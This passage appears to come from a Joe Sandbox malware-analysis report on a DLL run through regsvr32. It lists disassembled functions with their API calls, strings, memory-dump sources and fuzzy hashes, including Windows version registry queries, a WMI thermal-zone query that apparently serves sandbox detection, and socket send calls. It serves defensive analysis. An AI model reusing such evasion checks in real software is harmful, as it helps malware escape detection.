                                                                  • API ID: Variant$Prop$Clear$CompareErrorInfo
                                                                  • String ID:
                                                                  • API String ID: 2171276625-0
                                                                  • Opcode ID: ec02cff2a52354ec0a5f4776522683db5c48ebb4605341a00f42ac180da94bd5
                                                                  • Instruction ID: 9e678e67ad9e5e839980a2030d5613d05438112bf2e67499f8fff12cb395d787
                                                                  • Opcode Fuzzy Hash: ec02cff2a52354ec0a5f4776522683db5c48ebb4605341a00f42ac180da94bd5
                                                                  • Instruction Fuzzy Hash: 61518F71808B889BD312CF68894179BF7F8BFDA398F108E2DF994A6510E774D589C742
                                                                  Function 6C9460F0 Relevance: 13.6, APIs: 9, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  • Opcode ID: 114f7f3103d6c90178c812fe5bd341675c57f4efaef86e3dbe61956331959df6
                                                                  • Instruction ID: 317487c8cae66ea430acbc815802d80555efedd917456b5d34c3a9f42625e17b
                                                                  • Opcode Fuzzy Hash: 114f7f3103d6c90178c812fe5bd341675c57f4efaef86e3dbe61956331959df6
                                                                  • Instruction Fuzzy Hash: EE41C2F1508756DBC710DF29C44079ABBE4AF95318F10CA2AE8A0C7B56D334DA4ECB92
                                                                  Function 6C87CC70 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000001), ref: 6C87CCEA
                                                                  • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000800,00020019,00000001), ref: 6C87CD7B
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000800,00020019,00000001), ref: 6C87CDA9
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  • ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87CC7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$FreeHeapOpen
                                                                  • String ID: ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 3674198676-3947172187
                                                                  • Opcode ID: 6c4966479ebe97b97da6c2c9921fa1e092376efc175952349776b6782392d949
                                                                  • Instruction ID: 74bc848fe5f2d153bab5ab1f0217a66f7bd7f111798eefd7f508bd3410270f6a
                                                                  • Opcode Fuzzy Hash: 6c4966479ebe97b97da6c2c9921fa1e092376efc175952349776b6782392d949
                                                                  • Instruction Fuzzy Hash: F5B181B6E00219ABEF20DFA5DD85BEEBBB8AF14708F144425E904E7741E775D9048BB0
                                                                  Function 6C8BC450 Relevance: 12.4, APIs: 6, Strings: 2, Instructions: 436COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(000000B4,?,?), ref: 6C8BC558
                                                                  • memcpy.MSVCRT(00000000,00000003,00000002), ref: 6C8BC570
                                                                  • memcpy.MSVCRT(-000001EC,?,?), ref: 6C8BC5F3
                                                                  • memcpy.MSVCRT(000000B4,?,?), ref: 6C8BC838
                                                                  Strings
                                                                  • assertion failed: old_right_len + count <= CAPACITY, xrefs: 6C8BCCF1
                                                                  • assertion failed: old_left_len >= count, xrefs: 6C8BCD02
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: assertion failed: old_left_len >= count$assertion failed: old_right_len + count <= CAPACITY
                                                                  • API String ID: 3510742995-1889375005
                                                                  • Opcode ID: 25c7edcc28e26dc75dd12578fd1e4b79a647db9abb7eecff5e63fc5b893f682c
                                                                  • Instruction ID: 90b1407942d8f035b2419d30a6c4363e898866e8906a65bf9123c0048f5988c6
                                                                  • Opcode Fuzzy Hash: 25c7edcc28e26dc75dd12578fd1e4b79a647db9abb7eecff5e63fc5b893f682c
                                                                  • Instruction Fuzzy Hash: C302E875E016099FDB14CFA8C880AEEB7B1FF99304F14566EE809BB742EB309945CB51
                                                                  Function 6C9281A0 Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 318COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C9284FB
                                                                  • memcpy.MSVCRT(00000001,?,00000001,00000000,00000001,+NaNinf00e00E0assertion failed: ndigits > 0,00000001,?,assertion failed: parts.len() >= 6,00000022,6C98F300,assertion failed: buf[0] > b'0',0000001F,6C98F2CC,assertion failed: !buf.is_empty(),00000021), ref: 6C92851C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemset
                                                                  • String ID: .0.$assertion failed: !buf.is_empty()$assertion failed: buf[0] > b'0'$assertion failed: parts.len() >= 4$assertion failed: parts.len() >= 6$eEe-E--+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 1297977491-753802538
                                                                  • Opcode ID: 4597d7be1e16bd283a480e31d26b64e234b55a3fea402fd03c5383300bcaeaf4
                                                                  • Instruction ID: 4ea97965304b1048d33b0673b87b5f6668015621f05c4a70acb68ffa133a39fc
                                                                  • Opcode Fuzzy Hash: 4597d7be1e16bd283a480e31d26b64e234b55a3fea402fd03c5383300bcaeaf4
                                                                  • Instruction Fuzzy Hash: B3C139B3A112208BD7188F49C444F9A77A9FF8031CF16859BD8885FB6AC3B9D845C7C9
                                                                  Function 02633F50 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02633F55
                                                                  • SetLastError.KERNEL32(0000139F,?,02645054,02633628), ref: 02634044
                                                                    • Part of subcall function 02632B80: SwitchToThread.KERNEL32 ref: 02632BAA
                                                                  • send.WS2_32(?,02647440,00000010,00000000), ref: 02633FB6
                                                                  • SetEvent.KERNEL32(?), ref: 02633FD9
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02633FE5
                                                                  • WSACloseEvent.WS2_32(?), ref: 02633FF3
                                                                  • shutdown.WS2_32(?,00000001), ref: 0263400B
                                                                  • closesocket.WS2_32(?), ref: 02634015
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
                                                                  • String ID:
                                                                  • API String ID: 518013673-0
                                                                  • Opcode ID: 226028498a9f73032f8eaa01657bd0743361eb9b9a8cf7e4e8a02d42a4a9bc03
                                                                  • Instruction ID: 5c16462f094f6b8bb7ce9f0413b3ce538c3da2e6d28ccaac1b86be7fbc806b16
                                                                  • Opcode Fuzzy Hash: 226028498a9f73032f8eaa01657bd0743361eb9b9a8cf7e4e8a02d42a4a9bc03
                                                                  • Instruction Fuzzy Hash: A0215575640B009BD3319F68D888B9BB7F9BB44B14F900D0CE2938B780CBB5E895CB90
                                                                  Function 6C8D4600 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 281COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8D4719
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000,00000000), ref: 6C8D4724
                                                                  • GetLastError.KERNEL32(00000200,?,00000000,00000000,?,00000002,00000000,00000000), ref: 6C8D472F
                                                                  • GetLastError.KERNEL32(00000200,?,00000000,00000000,?,00000002,00000000,00000000), ref: 6C8D4740
                                                                  Strings
                                                                  • environment variable not foundenvironment variable was not valid unicode: , xrefs: 6C8D4967
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnvironmentVariable
                                                                  • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                  • API String ID: 2691138088-3632183283
                                                                  • Opcode ID: 240066c2dd122f054f53c1758424f3b9761e5a561f991ea3a5d9fc072b1eec15
                                                                  • Instruction ID: 896fbbfa27bc1188e0145cc679e64d9f346d149cb28cbcdbbcfc408f9dc1f732
                                                                  • Opcode Fuzzy Hash: 240066c2dd122f054f53c1758424f3b9761e5a561f991ea3a5d9fc072b1eec15
                                                                  • Instruction Fuzzy Hash: 79A1F1B5904300AFE720CF24DD81B9ABBE4AFC4708F154D28F898A7751E775E958CB92
                                                                  Function 6C8BCA10 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memmove.MSVCRT(?,?,?), ref: 6C8BCA8A
                                                                  • memmove.MSVCRT(00000005,?,00000000), ref: 6C8BCAA2
                                                                  • memcpy.MSVCRT(?,?,?), ref: 6C8BCAE9
                                                                  • memcpy.MSVCRT(?,00000001,?), ref: 6C8BCB0A
                                                                  • memmove.MSVCRT(?,?,00000000), ref: 6C8BCC8F
                                                                  • memcpy.MSVCRT(?,?,?), ref: 6C8BCCAE
                                                                  Strings
                                                                  • assertion failed: old_left_len >= count, xrefs: 6C8BCD02
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemmove
                                                                  • String ID: assertion failed: old_left_len >= count
                                                                  • API String ID: 167125708-4051586546
                                                                  • Opcode ID: 5345edf0fcae3003e8c972bf54e227368fa73f4d85a8ada5c7ecdf344a66f09e
                                                                  • Instruction ID: d64e5ef82f80d5ee769e5f02b382e9142faa625e19bb62d60d741368d6c62613
                                                                  • Opcode Fuzzy Hash: 5345edf0fcae3003e8c972bf54e227368fa73f4d85a8ada5c7ecdf344a66f09e
                                                                  • Instruction Fuzzy Hash: 45A18375D00E1A8BDB15CF68C850AEEB7B5FF99344F14436AD8097B202DB31EA56CB90
                                                                  Function 6C8F2320 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8F23C0
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000002,00000000,00000000), ref: 6C8F23C9
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F23D4
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F23E1
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F2457
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 6C8F2505
                                                                  • GetLastError.KERNEL32(?), ref: 6C8F2530
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                  • String ID:
                                                                  • API String ID: 1505103792-0
                                                                  • Opcode ID: ba07fdfb4d89320fc64c8a51aa30894ed355b20b697755ffc137707017584348
                                                                  • Instruction ID: 39a5a44bda171f4e1421cb4669711ed20e9156404dd10a420fd60e3908ae91d8
                                                                  • Opcode Fuzzy Hash: ba07fdfb4d89320fc64c8a51aa30894ed355b20b697755ffc137707017584348
                                                                  • Instruction Fuzzy Hash: 5F5126B1D002499BEB20DFA8CD89BEFB7B4BF15348F140924E824B7740E7798D0587A1
                                                                  Function 04F81F05 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: bc655f66725c4cc28e72ea1f37ef93ba4951298a8b79aa7d8469c82ae5f96c9d
                                                                  • Instruction ID: 28a87a5a082ea87a084897c1f5940c228b887a3b5a8ed4a56030294f61500e43
                                                                  • Opcode Fuzzy Hash: bc655f66725c4cc28e72ea1f37ef93ba4951298a8b79aa7d8469c82ae5f96c9d
                                                                  • Instruction Fuzzy Hash: C55119B6A00115CFD714EF58D984869BBA6FF8831872A81BDD50A5F322D732BC43CB91
                                                                  Function 02631830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 02631878
                                                                  • _free.LIBCMT ref: 026318B6
                                                                  • _free.LIBCMT ref: 026318F5
                                                                  • _free.LIBCMT ref: 02631935
                                                                  • _free.LIBCMT ref: 0263195D
                                                                  • _free.LIBCMT ref: 02631981
                                                                  • _free.LIBCMT ref: 026319B9
                                                                    • Part of subcall function 02637009: HeapFree.KERNEL32(00000000,00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B), ref: 0263701F
                                                                    • Part of subcall function 02637009: GetLastError.KERNEL32(00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B,?), ref: 02637031
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 5475982ba0b8bf660b958cb985a83a4e899beb0cdc9510cdb5514797786fc4fb
                                                                  • Instruction ID: a1fb11c9c27f8747c38229c1b023cef3c7bdb3609eb6db68df17c0708875c0f4
                                                                  • Opcode Fuzzy Hash: 5475982ba0b8bf660b958cb985a83a4e899beb0cdc9510cdb5514797786fc4fb
                                                                  • Instruction Fuzzy Hash: 53513BB6A00115CFC706DF48C480969BBB6FF8A31872980AED54E6B351D732EC42CF91
                                                                  Function 02639BEA Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02645EB4,?,02637822,02647B80,00000014), ref: 02639BF2
                                                                  • __mtterm.LIBCMT ref: 02639BFE
                                                                    • Part of subcall function 026398C9: RtlDecodePointer.NTDLL(026491C8), ref: 026398DA
                                                                    • Part of subcall function 026398C9: TlsFree.KERNEL32(026491CC,02639D60,?,02637822,02647B80,00000014), ref: 026398F4
                                                                    • Part of subcall function 026398C9: _free.LIBCMT ref: 0263C070
                                                                  • TlsAlloc.KERNEL32(?,02637822,02647B80,00000014), ref: 02639C8B
                                                                  • __init_pointers.LIBCMT ref: 02639CB0
                                                                  • __calloc_crt.LIBCMT ref: 02639D1E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02639D4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 347030822-0
                                                                  • Opcode ID: a8b9ed24eb4b7dfcb820ff44d9dfa037647e7c264feb23903140c9d9c7825ae4
                                                                  • Instruction ID: eecb5f1c708fffb81968668adb625a0434bf4bca12fc83205923ca20ca8c5ea1
                                                                  • Opcode Fuzzy Hash: a8b9ed24eb4b7dfcb820ff44d9dfa037647e7c264feb23903140c9d9c7825ae4
                                                                  • Instruction Fuzzy Hash: BD318F39D813159BD72AAF75F84861EBBE5AB403287142D1AE481C3390DBB4D0B1CF40
                                                                  Function 6C861E90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(WQL), ref: 6C861EB2
                                                                  • SysAllocString.OLEAUT32(SELECT * FROM MSAcpi_ThermalZoneTemperature), ref: 6C861EC1
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C861EE3
                                                                  • SysFreeString.OLEAUT32(?), ref: 6C861EEB
                                                                    • Part of subcall function 6C892680: SysFreeString.OLEAUT32(8904C483), ref: 6C89268D
                                                                  Strings
                                                                  • SELECT * FROM MSAcpi_ThermalZoneTemperature, xrefs: 6C861EBC
                                                                  • WQL, xrefs: 6C861EAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                                                  • API String ID: 986138563-2989581318
                                                                  • Opcode ID: 100ef789db2e76685ec82bab2144961be6500448f6b33dce41eea9477e28ef39
                                                                  • Instruction ID: 474ae3c8aa4e1ece6205c27d90242b37d8709982c0823f819fcb26c6e02b9d55
                                                                  • Opcode Fuzzy Hash: 100ef789db2e76685ec82bab2144961be6500448f6b33dce41eea9477e28ef39
                                                                  • Instruction Fuzzy Hash: 9421D8B1C016099BCB11DFA9C945EEFF7B8BF54308F108925E4197BA01E774E948CBA1
                                                                  Function 6C892240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32 ref: 6C892255
                                                                  • SysStringLen.OLEAUT32 ref: 6C89225D
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 6C892272
                                                                  • SysStringLen.OLEAUT32(00000000), ref: 6C89227E
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C8922A7
                                                                  Strings
                                                                  • called `Result::unwrap()` on an `Err` valueObject has been over-released., xrefs: 6C8922C5, 6C8923B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree
                                                                  • String ID: called `Result::unwrap()` on an `Err` valueObject has been over-released.
                                                                  • API String ID: 344208780-2674442498
                                                                  • Opcode ID: 6fae7ea3824f581ea6d227adc872b497279036be2c0aae54b70c385544ee28b6
